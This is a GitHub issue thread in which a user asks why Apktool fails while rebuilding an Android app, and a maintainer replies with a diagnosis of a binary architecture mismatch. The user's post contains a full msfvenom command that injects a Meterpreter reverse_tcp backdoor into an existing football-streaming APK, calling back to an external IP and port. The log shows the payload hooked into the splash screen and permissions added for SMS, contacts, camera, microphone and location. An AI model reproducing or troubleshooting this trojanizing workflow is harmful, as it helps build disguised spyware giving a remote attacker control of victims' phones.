### ISSUE TITLE
[BUG] W: /tmp/brut_util_Jar_100686835942612887834480145388646559215.tmp: 1: ELF: not found

### ISSUE THREAD

**Issue by Madhu10474** [iBotPeaches/Apktool#3450]
──(root㉿kali)-[/]
└─# msfvenom -x ff.apk -p android/meterpreter/reverse_tcp lhost=147.185.221.16 lport=7538 -o ff1.apk
Using APK template: ff.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package aler.football.tvhd.gdato
[*] Loading /tmp/d20231128-32087-yi2l21/original/smali/aler/football/tvhd/master_splachscreen.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20231128-32087-yi2l21/output.apk
[-] I: Using Apktool 2.9.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
brut.androlib.exceptions.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [/tmp/brut_util_Jar_100686835942612887834480145388646559215.tmp, compile, --dir, /tmp/d20231128-32087-yi2l21/original/res, --legacy, -o, /tmp/d20231128-32087-yi2l21/original/build/resources.zip]
W: /tmp/brut_util_Jar_100686835942612887834480145388646559215.tmp: 1: ELF: not found
W: /tmp/brut_util_Jar_100686835942612887834480145388646559215.tmp: 235: Syntax error: "(" unexpected (expecting ")")
[*] Unable to rebuild apk. Trying rebuild with AAPT2..
[-] I: Using Apktool 2.9.0
I: Checking whether sources has changed...
I: Checking whether resources has changed...
I: Building resources...
brut.androlib.exceptions.AndrolibException: brut.common.BrutException: could not exec (exit code = 2): [/tmp/brut_util_Jar_157266743348640517445421209736354640010.tmp, compile, --dir, /tmp/d20231128-32087-yi2l21/original/res, --legacy, -o, /tmp/d20231128-32087-yi2l21/original/build/resources.zip]
W: /tmp/brut_util_Jar_157266743348640517445421209736354640010.tmp: 1: ELF: not found
W: /tmp/brut_util_Jar_157266743348640517445421209736354640010.tmp: 235: Syntax error: "(" unexpected (expecting ")")
Error: Unable to rebuild apk with apktool

I can't understand what is the error can anyone solve this

**Comment by iBotPeaches** [comment]
Are you running this on Android?

This line

> W: /tmp/brut_util_Jar_100686835942612887834480145388646559215.tmp: 1: �ELF: not found
> W: /tmp/brut_util_Jar_100686835942612887834480145388646559215.tmp: 235: Syntax error: "(" unexpected (expecting ")")

Suggests you are on some arch incompatible with aapt binaries.
